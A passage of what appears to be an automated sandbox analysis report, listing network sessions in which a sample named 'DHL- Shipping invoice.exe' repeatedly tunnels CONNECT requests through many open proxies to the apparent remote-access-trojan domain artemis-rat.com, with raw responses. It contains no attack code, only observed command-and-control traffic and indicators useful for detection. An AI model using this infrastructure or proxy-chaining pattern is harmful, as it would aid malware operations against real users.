3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.449809104.20.89.77806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.520884991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.608174086 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.44980738.162.22.4831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.533216000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.833473921 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.449825104.16.105.146806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.558823109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.646116972 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.449801208.87.131.240296246484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.575819016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.449905211.234.125.54436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.598301888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.449845104.21.66.184806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.598393917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.685954094 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.44977435.79.120.24231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.599689007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.883912086 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.44979338.50.130.9356786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.604032040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.44985345.14.174.148806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.615886927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.703568935 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.449814162.214.170.144317016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.620014906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.077853918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.593507051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.609200001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.750344992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.859575987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953830957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.066175938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.250718117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.44985945.12.31.140806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.623627901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.711498976 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.4498661.0.0.84806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.635890961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.723136902 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.44982838.180.122.129806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.642334938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.807356119 CET306INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.44981195.84.166.13880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.649805069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.44987238.162.31.21131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.664810896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.966157913 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.44984220.111.54.1681236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.666697025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.827764988 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.449901104.17.248.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.687899113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.775378942 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.4499484.182.9.1084436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.692660093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.449913172.67.182.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.703908920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.791095018 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.449792120.37.121.20990916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.719454050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.071047068 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.1
                            Date: Tue, 12 Mar 2024 07:36:52 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.449834200.41.148.2120006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.726382017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.44992438.54.95.1931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.731842995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.835757971 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.449899107.180.90.88203096484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.732263088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.171622038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.624748945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.531023979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.447758913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
